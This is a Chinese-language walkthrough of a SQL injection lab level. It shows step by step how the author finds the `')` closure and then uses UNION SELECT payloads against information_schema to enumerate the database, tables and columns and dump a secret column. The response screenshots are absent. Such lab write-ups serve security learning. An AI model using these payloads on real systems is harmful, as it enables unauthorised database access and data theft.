这一关的欢迎界面提示我们还是以id作为注入点 我们仍然有14次尝试机会

首先我们还是先来判断一下是否属于数字型注入 输入如下

id=1 and 1=2

回显如下 正确回显 属于字符型

接着输入1' 查看回显

 这个回显说明两件事情 一个是我们后面不能使用报错注入进行注入了 一个是我们这个注入类型一定存在单引号闭合 但是不确定是否有其他修饰符 所以我需要进行佐证 输入1'--+ 回显如下

 

没有回显就是带有修饰符 试试看1')--+  终于出现了回显 回显如下

 接着使用联合注入的方式进行爆破操作 首先进行爆回显点操作 输入如下

id=0') union select 1,2,3--+

回显如下

接着进行爆库和版本号操作 输入如下

id=0') union select 1,database(),version()--+

 回显如下

接着进行报表操作 输入如下

id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 回显如下

接着进行爆字段操作 输入如下

id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='oqnp8joot2'--+

 回显如下

接着进行爆用户名和密码操作 输入如下

id=0') union select 1,2,group_concat(sessid,'-',secret_2HM7) from oqnp8joot2--+

 回显如下

又是一关被通过 嗨嗨！！